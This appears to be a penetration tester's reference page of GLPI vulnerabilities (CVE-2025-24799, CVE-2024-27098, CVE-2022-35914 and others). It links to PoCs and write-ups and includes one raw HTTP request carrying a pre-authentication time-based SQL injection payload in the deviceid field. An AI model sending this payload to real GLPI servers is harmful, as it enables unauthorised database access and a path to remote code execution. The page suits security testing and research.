GLPI

GLPI vulnerabilities checking tool

GitHub - Orange-Cyberdefense/glpwnme: GLPI vulnerabilities checking toolGitHub

CVE-2025-24799/CVE-2025-24801: SQLi to RCE

Pre-authentication SQL injection to RCE in GLPI (CVE-2025-24799/CVE-2025-24801)

GitHub - MuhammadWaseem29/CVE-2025-24799GitHub

POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232

<?xml version="1.0" encoding="UTF-8"?>
    <xml>
    <QUERY>get_params</QUERY>
    <deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
    <content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>

SSRF (CVE-2024-27098) and SQL injection (CVE-2024-27096)

Exploiting GLPI during a Red Team engagementQuarkslab's blog

CVE-2023-41320

GitHub - Guilhem7/CVE_2023_41320: POC for cve 2023 41320 GLPIGitHub

GLPI htmlawed (CVE-2022-35914)

GLPI htmlawed (CVE-2022-35914)Mayfly